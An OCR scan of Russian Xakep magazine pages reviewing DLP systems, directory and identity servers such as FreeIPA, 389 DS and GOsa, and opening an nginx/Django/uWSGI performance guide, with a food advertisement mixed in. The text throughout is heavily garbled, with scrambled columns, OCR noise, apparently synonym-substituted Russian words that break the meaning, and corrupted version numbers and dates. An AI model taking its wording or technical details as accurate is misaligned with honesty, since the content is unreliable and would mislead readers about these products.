- ·- · ck-~-ol>old

...

~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

0

MyDLP

Просмотр снимков экрана на

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е Красава вместе с веб-nрокси [Squidl про фильтрации входящего равно ис­

DPI [Deep Packet

lпspectioп, солидный рассмотрение танцевальный шаг кетов! равно умеет отпускать прото­

х од моя особа щего веб-трафика , употребление на качестве контентнога

колы за пределами зависимости ото порта, поэтом у сис хрия позволяет несложно

ф ильтра ради

соз вкладывать политики для того любого вида траф ика: веб-трафика,

sos т а вление списков

Postfix, MS Exchange, интегрирование от Zimbгa; ACL сверху ос нове IР -адресов да шаблонов.

трафика соцсетей, файлового, почтов ого да !М-трафика. Распозна­ ются со инхронизации не без; мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc да iTuпes. В сегодняшний день промежуток времени во офици ­

альных от 14 сках н ет поддержки Р2Р равно

MyDLP умеет

обнар у живать равным образом разверзать зашиф­

Функ ционально система, n остроенная получи

Skype.

Возможно пускать в ход вспомогательный составляющая полно­

текстового п оиска

К пунш е того ,

р ов анные файлы иначе говоря файлы, закрытые паролем [если вкушать ключ!.

Devicelock Seaгch Sегvег [DLSSI, какой-никакой

MyDLP,

состоит изо четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся интересах

находит информацию во теневы х ко пия х да журналах. Управление

nерехвата ТСР-соединений равным образом является коренной про

производится подле помощи гр у пповы х государственный деятель домена, поэто­

Написан в E гlang равно

му клиенты бессознательно п одх ватывают установки. Правил а

не без; равным образом стеме, поддерживающей интерпретаторы.

создаются сквозь вычитчик

На от л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена балка

Епtегргisе Manageг, от nо собная nолучать эмпирика

изо любых LDАР-каталогов, во рента

Console

Python,

MyDLP.

можетбытьустановлен держи каждый

MyDLP Endp oint - aгeнт, выясняемый получи конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 02/64 - битные

тролирова т ь всё-таки критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е помогите тояни е агентов. Такж е кли­

nечать, грабеж экрана, исходатайствование nрав администратора равно т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, кто такой равно какие

е нты могут рот навливаться от ранее nрек онфигурирова нны ми

материал использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые периодично nодключаются для Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки да сбрасывают лог. Написан возьми РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 00.04 LTS. ОС клиенты: Windows ХР, Vista, 0 (x86/x64l.

отнюдь не вызывает. Девиз

Бесnл~тная DLР-си не без; проблематика [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl вместе с отк рытым исходным

ко дом, включающая шеренга функций про пр едотвращения прибыль

жайших nланах- POP/ IMAP, MSNMS/Jabbeг равным образом MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 07-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR равным образом др . ;

равным образом архивов-ZIР,

0z,

ажно небольшое видео руководство. П осле из-за n уска клиента на трее

Python-Magic , как

Ubuntul, изображение VMwaгe равным образом реnозиторий Ubuntu 00.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные накопления анализа, подлакированный интерфейс, каран т ин, функцию

ар х ивирования равно обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование да карантин!; файлов

в области МD5-хешу;

018

О реп nолностью по отношению т ражает соль

невозможно. Проект предлагает монтировочный 050-образ [на базе

испытание nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

описание М 0М Е-типа за данным

Easy, Simple,

Документация проекта охватывает десяток мануалов, сделал т ь

nоявляется значок, сnрятать тот или другой вместе с п омощью штатных средств

данны х:

LibгeOffi ce

настроек равным образом журнала собы т ий исnоль­

Процесс настройки равно подключения клиентов трудностей

Русификация: нет как нет (возможна собственными силами!. эту аббревиатуру в духе

Adobe Flex, ради хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, сколько

DLP- сие

nрежде сумме инструмент, позво­

ляющий гораздо ослабить риски, присутствие ко т орого уж само

выписка тек не без; та изо файловбинарных форматов;

в соответствии с себя дисциnлинирует сотрудников. Ожидать, почто укоренение

открытие исходного стих [C /Cн/C#/Java/A DA да др.l; идентификация банковских счетов/кредитных карт, некоторых

этакий системы гарантированно защитит ото утечек , возникающи х

национальны х идентификационных стриптиз ов;

захочет послать alias выплеснуть ценную информацию, спирт жив не буду

на результате умышленных действий, в свою очередь малограмотный стоит. Если инсайдер

служба пользовательски х правил равным образом регулярных выражений,

найдет метода чтобы этого, вследствие чего необходимо тоже ис n ользовать однако

статистический изучение да байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 058/ 001 0


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , идеже на мире откопать самые сливки пищевые продукты . Вы знаете, что-то можете выискать их рsщом , лещадь маркой TASH


SYN/ACK

Сернуля gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA давно вер~:: 2.1.3 включи;ел

не без этого СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени ваш покорнейший слуга следуе обновиться до самого

,

0 04

'' '' '' ''

\ \

'

-

по отношению FгeeiPA

автор этих строк

исnользуется А~

аутентификаци

равным образом авторизац~~t для в решении насчёт

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

безвыгодный выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

найти

Sync. После установки

оnакета 089-dsдля 389DS конфигура~;ситить

должно после

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

на сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

020

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные отношения

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

0,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 00 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста да

089

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна на работе

SERVER

Разработчики отмечают высок у ю отдача равным образом мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, полноте трудиться во Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 01, lrix, AIX, Windows равным образом OSF/1 . обществом присутствие спонсорской поддержке

0996

возраст

Red Hat. Базой для Netscape Оiгес tогу

одной путы может трудиться прежде четырех

конфликтов, балансировкой н агрузки да резервированием сервера . Поддерживаются работающие во режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег на

Active

Оiгесtогу

Win2k8 .

В сегодняшний день промежуток времени схема парадно предлагает репази­

тарий да пакеты в целях RHEL/Fedoгa [подходят да на Ceпt05l. Кроме того, возможна регулировка на других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 01. Некоторые версии поддерживаюттакже Windows, lгix , AIX равно 05 F/ 0. Однако ход да последующая подпора

0егvег.

Он получил новое имя- F edoгa Оiгесtогу 0егvег- задним числом того,

Red Hat. В 0009 году 389 Оiгесtогу 0егvег [389 объединение номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

08905 . В

равноправных мастер-серверов от автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

на правах компетенция сверху него во

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix равным образом сервисами

Сайт проекта:

послужил разрабатываемый со

е

году приобрела

замысел в который раз изменил обозначение в

на << неофициальных>> системах требует через админа сейчас некоторой

ассоциировался вместе с Fedoгa, что, до мнению разработчиков, тормо­

подготовки.

зило развитие, во частности интеграцию во некоторые дистрибутивы.

Компоненты

На основе

08905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 0егvег [R H0 01 не без; техподдержкой 04/7. Возможности 089 05 включают полную поддержку пр отокола LDAPv3, 05 L/ТL5 - равно 0А5 L­

08905

выпускаются соответственно лицензии

GNU GPL,

а сер­

вер базируется держи ряде продуктов из другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, в чем дело? 089 05 является помогите т авной частью F гee iPA- централизованного решения интересах управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией по части nользователях равно политиках да про аудита. Речь об

жете роль) со

этом продукте пойдет хоть сколько-нибудь ниже.

Active Оiгесtогу [при условии, ась? бери КД Win2k3/2k8 установлен схема Windows 0yncl, дифференциация доступа впло ть поперед отдель н ых а три бутов [и мя, гр уппа, IP равным образом т. д .l В качестве криптадвижка используется публичка N55 с Mozilla Pгoject. Конструктивно 08905 состоит с сервера каталогов [Саге Оiгесtогу 5егvег, СО51 да сервера администрирования [Admin 0егvегl. Задача последнего- господство всеми доступными С О5 , для того а пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, отражение VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 0егvег [М О5 0 - простое во использо ­

лагается графическая ферма [389-coпsolel да утилиты командной строки. В

Linux модильон устанавливается механически [написана на Javal. Для управления из-под Win2k3/2k8 в сайте проекта сле­ дует скача ть программа Windows Console.

вании решение, nозволяющее возле помощи наглядного интерфейса уnравлять учетными записями пользователей равно груnп, доступом

да сетевыми сервисам равным образом . П об сути, сие удовлетворительно обная ют по-над

FUSIONDIRECTORY Поскольку путь для исходному коду

GOsa

расшивка ради управления, имеющее больше

Четко определен оглавление поддерживаемых

удобные инструменты ради разработки,

дистрибутивов (DeЬian, CeпtOS

однако равным образом развить документацию .

0/RHEL 0, Fedoгa 14/15, openSUSE 01.3/11 .4, SLES 011, и, главное,

приняли вердикт в рассуждении создании сильнее

В октябре 0011-го вышла вариация FusionDiгec­

ради каждого с них создан репозиторий ,

открытого да целиком и полностью поддерживаемого

toгy

сообществом фор ка пользу кого привлечения

началась вовсе недавно, в отношении каких -то особых

сторонних специалистов, а и обеспечения

функциональных отличиях ото

на тех, который малограмотный имеет взаимоотношения ко компании

Gonicus GmbH,

был затруднен, разработчики

0.0.2, но,

что-то около наравне производство надо nроектом

GOsa

все еще

обеспечивающий простую установку. Еще одно лента заключается в бесстрастно поддерживаемых веб­

условий в целях написания плагинов подо большее

беседовать никак не nриходится. Документация , по мнению сути,

серверах. Разработчики nредлагают готовые

доля приложений. Новый чтение

состоит с испарения руководств, но, учитывая

конфигурационные файлы к

получил термин FusioпDiгectoгy ( fusiondiгec­

агнация из

равным образом

GOsa,

сверху стадии ознакомления

Lighttpd,

Apache2

возможна в свой черед сборка

toгy. org l . Разработчики обещали невыгодный всего

вместе с FusionDiгectoгy дозволено воспользоваться

держи пgiпх , так настройки придется образовывать

разработать самое <<м ощное равным образом универсальное >>

документацию бери материнский проект.

самостоятельно.

ХАКЕР

03/158/2012

021


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 0989288883 GIO : 0989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 0dc4c446 - 02eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA=, AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

08118469281326Z krbpa s swordexpiration : 08118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc=t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA не грех

LDAP- OpenLDAP,

Консоль управления

эксплуатировать выступ

хотя бы возможна да совместная действие не без;

08905.

Active

089 Directory Server

Diгectoгy равно позволяющей централизованно запускать аутен­

Функционально может выстуnать на качестве РОС !уровня Windows NT41, LDAP-cepвepa со синхронизацией учетных заnисей равным образом nар а ­

тификацией пользователей, устанавли во ать политики дост упа да ау­

лей, nолностью прийти в смену

проектов, таких равно как дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- сие сожительство неск ольких опенсорсных

КегЬегоs равно может оказываться исnользован про организации однократ утнапиштим

08905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом рядом финансовой подд ержке Red Hat, основан используемый во коммерческом дистриб утиве продукт IPA, какой Red Hat перед ста дух общественности летом 2008 года. Впервые адрес FгeeiPA п оявился на составе Fedoгa 0 lмай 0008гоl, тем не менее нормальная синхронизирование не без; Active Diгectoгy сверху оный

аутентификации 05501. Разграничени е по сту nа для того объектов уста­

час до этот поры никак не была реализована. На первых порах клиенты

навливается вnлоть предварительно отдельных атрибутов: пользователь, гр уnпа,

могли присоединяться вручную, однако сие было неудобно. В октябре

IР-адрес, срок равным образом т. д.

0009-го началась процесс надо нов ой веткой

Active

во нее. Клиентскими ОС могут прислуживать

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов да ACL в 0amba, заворачивать совмес тным достуnом, nечатью для базе CUP5, доставкой nочты IPostfixl, настраивать 0quid равным образом службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

равным образом Мае

Особенно nриятно, в чем дело? проблемы, преследовавшие компанию Mandгiva, неграмотный затронули

MD5

равно nродукт nостоянно развивается.

да

0.0. Ее

финальная

трансформация была накануне ста вл ена во конце марта 0011-го. День , на который был анонсирован релиз, запомнился многим пользователям

В последних версиях ко указанным возможностям добавилось

вроде << F edoгa

у дуумвират учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В сегодняшнее времена реализованы:

05 Test Da y»,

Linux

рукоположенный в частности тестированию

совместную работу, централизованное скрывание nубличных клю­

централизованное руководство учетными записями п ользо ват е­

из какого рода

лей, групп, компьютеро на равно сер ви сов;

Open5SH , аудит,

политики паролей равно многое другое. Модульная

структура nозволяет приобщать нужную функциональность alias

руководство дост упом для приложениям, устано вка дипломат танцевальный шаг ро­

удалять изо интерфейса лишнее.

лей равно настроек КегЬегоs, управле ние правилами

MD5 быстро

масштабируется, под­

держивая сколько-нибудь тысяч заnисей сверху в отношении дин сер во ер. Неn осредстве нно пользу кого уп равления сервисами предназначен

Host Based Access Соntгоl-управление да прятание ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 0егvегl.

узел ММС

обмена

agent, сложенный в Pytho n равно да от nоль зую щий для да нными XM L-RPC. Агенты настраиваются близ помощи

беда nростого во исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может выкроить единственный с двух режимов отображения: Noгmal тож Ехрегt. В награда через

08905,

0UDO;

идентификация КегЬегоsдля пользователей равно узлов;

Сеть, построенная из применением FгeeiPA , функционально мо­ жет значиться изо трех типов систем : одного иначе говоря нескольких серве ­

пакеты nредлагаются безвыгодный всего-навсего про «род­

ного » дистрибутива: нет перевода настоящий репозиторий

Debian,

ров, клиентских машин равным образом компьютера администратора. По следний, по сути, представляет с лица простой абонентный мол сктоп из кон­

сборки ради Cent05/RHEL/Fedoгa равно open5U5E, а и подготовленный

сольными утилитами на удален ного уп равления FгeeiPA !кстати,

облик VMwaгe. Таким образом, серверную порция

пустить в дело их совершенно отнюдь не хоть лопни - радикально допускается привыкать

MD5

не запрещается отно ­

сительно памяти равно минус nроблем назначить во все одинаково какой *niх-системе.

веб-интерфейсом, тот или иной написан держи

Продукт включен на ассортимент nоставки Mandгiva Ent eгpгise 0егvег.

MD5

nредставляет из себя самое простое во установке да конфигури­

Ja val.

Чтобы убавить нагр узку держи канал, пациент использует локаль­

ный кеш ILDB да XM LI, получая с него настройки во томище числе равным образом быть

ровании решение, освещенное на нашем обзоре, тем не менее самос тоя­

отсутствии доступа ко серверу. На клиентской системе устанавли­

тельная установка в других системах, в дополнение МЕ5, как ни говорите требует

шибко подробна да nозволяет разобраться нет слов всех его нюансах.

вается ходок управления аутентификацией 0550 l5ystem 0ecuгity 5eгvices Daemonl . Клиентская пакет реализована безвыгодный токмо для Red H at/Fedo гa равно клонов, хотя равным образом пользу кого др у ги х ОС равным образом платформ: AIX,

iid!I!IIЩ

движение ке т ов для того

Сайт проекта:

их

некоторых навы засада соответственно работе от

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние для того L iпuх-систем среды, представляющей на лицо альтернативу

022

open5U5E. Что интересно, надо сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l да обесnечением совместимости работают банан сотрудника Red Hat.

HP-UX,

0olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов равно уnравление ими, автоматично генерир уя да nо­ лучая свежеиспеченный документ в соответствии с истечении срока поступки ветхо г о. Опционально возможна слияние из DN5-сервером в базе

!нужен nлагин

BIND LDAP BIND со динамическим обновлением чрез

ХАКЕР

03/158/2012


Корпоративные блат

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

0 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs равным образом

.

·d

J

~~

Linu x, Windows

равным образом Мае

05

Х , исходные

ADS нате любой Java . возможностей LDAP,

тексты nозволяют снарядить

Java, Change

системе , пользу кого которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется что

реализованы хранимые процедуры , триггеры,

встраиваемое во прочие Jаvа-nриложения

динамические объекты

решение, за всем тем сам черт никак не заnрещает

другое. Распространяется подо лицензией

проэксплуатировать его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

осуществление

~

Foundation

apache . oгg ). Полностью наnисан для

Winblnd

Authentic111tion Method:

во

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

равным образом КегЬегоs , возможна

Java

равно многое

совершение поддержки любого протокола .

LDАР - браузер, браузер со х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты ради установки

администрирования.

да

DSML,

клиентские программы на

Менеджер аутентификации во Fedora позволяет подобрать FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами равно группами компьюте­ ров доверенность подтверждаются рядом п омо щ равно Ке гЬ е г оs keytab или — или

ет уп равлять протокол ны ми следовать п ис ями

сертификата.

телей равно групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной равным образом клиентской части по­

средоточие уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

да

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет не принимая во внимание особых проблем интегриро во ать FгeeiPA равно произвольный

равно т. д . Волга зработка вед ется почти эгидой компании

продукт. В сегодняшнее пора политики ис п ользуются на томик числе

для от раиса использует

GOsa

п ользова­

во своих сервисах.

да настройкам рабочего стола. По ка реализо ваны н е однако функции

Все функции вын есе ны на плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию на соо твет­

упра вления политиками , аудита равным образом контроля, которые пл анируется

ствии со своими н контия дами.

равно интересах хра нения чета мет углубление д ос т у жете для локальным прилож ениям

В сегодняшний день миг реализо ван по отношению больше

подсоединить на проект.

Н е т н астроек правил

SELinu x,

подо держки

централизованно г по части управления ключами

Samba, Fгe eRA DIUS , SSH равно LVM, ОТРи многого

другого. Очевидный порок проду ко та- осведомленность на пер­ вую по отношению ч ередь получи производные что касается т

Red Hat дистриб ути ваша сестра .

Устано крутить

сервер н ую ч асть Fг ee iPA позволительно с репозиториев F e d oгa,

K12LTSP

CentOS,

равно совмес тимы х вместе с ними . Р азработчики сдела ли всё , так чтобы

упрости ть дело локализации на версии 0.0 [ис польз бакс тся gettext и UTF8]. В каталоге ins tall / po как не быть обложка гu.ро, на ко т ором nере ­ веде для всего лишь малая порция сообщений. Пр оект по-черному развивается, равно присутствие этом обнаруживаю т ся об шиб­

0.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 0011-3636].

00

плагинов, обеспе­

чиваю щ их отдел такими сервисам и, на правах

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, равно серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом всё-таки вам ш еуказан ны е nлагины никак не обяза тельн что касается д олжны сидеть получи и распишись одном сервере, неко­ торые изо них мож н об устано свивать сверху отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся во гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

не без; прописанными п равами дост упа ко объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит с как , об пр е д е ляющего явственность , объектов [поль ­ зова т е л ей/гру пп] да разреше н ий. Разрешения опре д е ляют целое

ieiN4

на озмож ны е д ейс тв ия: соз д а ни е, крюк л ение, перенос , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, изо исходных текстов- все так же кто *nix. Пр оект

протокол равным образом т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

один лишь на нашем обзоре замысел вместе с локализо­

ванным интерфейсом у правления. Правда , локализован некто доколе

далеко не полностью, н что касается исnользова ни е

gettext

за зволяе т присутствие необ хо ди­

мости свершить сие самостоятельно.

Поддерживает ся обычай н овка на любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , около что соз дан каждый

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е давно от т у пны пакеты ради Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, во вкусе правил о, разработчики невыгодный спешат их соби воинство , отчего вер эти одну каплю запаздывают. Можно исполь ­ зовать произвольный веб - сер вер, касательно дн ако преимущественное право по отношению тдается

да

nginx.

Apache2

Д окумен тация д ос т у пна ведь ль ко для английском равно н е п о­

спевает ради развитием проекта, многие моменты отражены во н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, что-то в особенности многофункцио­ USERS

относительно --

0

нальным инструментом является

GOsa2.

Это постановление обесnечивает у руководство у ч етными после n исями да многочисленными се рвисам и, поддер живает усик тан овку

во потому что льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й запас зависит через конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 058/ 0012

вслед за дачи . :х:

023


SYN/ACK

Евген Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений возьми догадка невальна приходят такие названия, что

nginx, memcached, еассеlегаtог, hiphop равным образом им подобные . Фактически сие нормальный

подборка про любого высоконагруженного сайта, написанного из использованием РНР. Но что-нибудь ежели мы хотим выдавить постоянно соки изо сайта на 121,

Django? ХАКЕР

03/158/ 0012

.


И из пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 0obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" от n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 08::п.лат не: сн ... аJt lнl ~- · так АО кон ца

T1ogedltems

n-1111 ..

постоянно их адреса помощью точку со запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

011ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет определять кеш объединение нескольким memcachedcepвepaм во автоматическом режиме . Для сего порядочно показать

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 0211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, наш брат собираемся зап у стить новоизобретённый веб-проект и решили созидать его не без; использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, ась? возлюбленный красив, производителен да невероятно Pythoп, с намерением максимально освободить программ иста. Благодаря

Вместо MySQL можно, понятно же, найти PostgгeSQL. Django, а и uWSGI да pythoп-memcached я поставим с репо­

архитектуре модель-вид-контроллер [MVC) да модульном у дизай­

зитария Pythoп .

дружелюбен ко разработчикам. Djaпgo использует всю мощь языка

ну, так вкушать структуре, построенной изо обособленных кирпичиков, Оjапgо-приложения получи ошеломление просты на конструировании и сопровождении. Система беретик получай себя

00% работы,

$ sudo easy_install django uwsgi python-memcached

благодаря тому описа­

ние данных, формирование алгоритма их обработки да отображения пре­ вращается во тривиальную задачу, нередко решаемую во до некоторой степени

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого пишущий эти строки расскажу позже:

десятков строк заключение [например, в целях создания простейшего сайта с полноценной веб-админкой полно начертать лишь изрядно

строк) . И всё сие сверх уродливого SQL, скрытого ото программи со та за классами Pythoп, возьми основе которых равно генерируется проект базы данных.

Мы ожидаем, почто выгода короче кто наделен высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё в соответствии с стандартной схеме. Бэка­ пим трафаретный конфиг nginx:

потому-то нам нужно за единый вздох предугадать весь возможные пути опти­

мизации . Перво-напер умереть и неграмотный встать автор сих строк должны удосужиться легкий, скорый ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

приспособленный на настройке равно сопровождении веб-сервер. Это, вестимо

же, пginx, что без труда никак не имее т конкурентов согласно скорости

Создаем свежеиспеченный конфиг равным образом пишем во него следующее:

отдачи контента. Мы откажемся через стандартных конфигураций с что касается всякими громоздкими апачами держи стороне бэк-энда равно будем

истощить пgiпх наравне коренной веб-сервер [впоследствии такую схему позволяется совсем нечего делать увеличить не без; через дополнительных серве­

ровенник равно балансировщиков нагрузки). Второй шаг- расшивка вопроса в рассуждении книжка , что будут связаны nginx и Djaпgo . Понятно, сколько паче всего делов воспользоваться интерфейс

WSGI, сфабрикованный с умыслом про Python, хотя наша сестра должны выбрать правильную реализацию сего интерфейса . Казалось бы, здесь вариант один- mod_wsgi с комплекта пgiпх, одначе для значение

связующего звена свыше годится бридж uWSGI [ pгojects.unblt . it/

uwsgi ), тот или другой показывает намного лучшую производительность при минимальных требованиях для оперативной памяти [пруфлинк

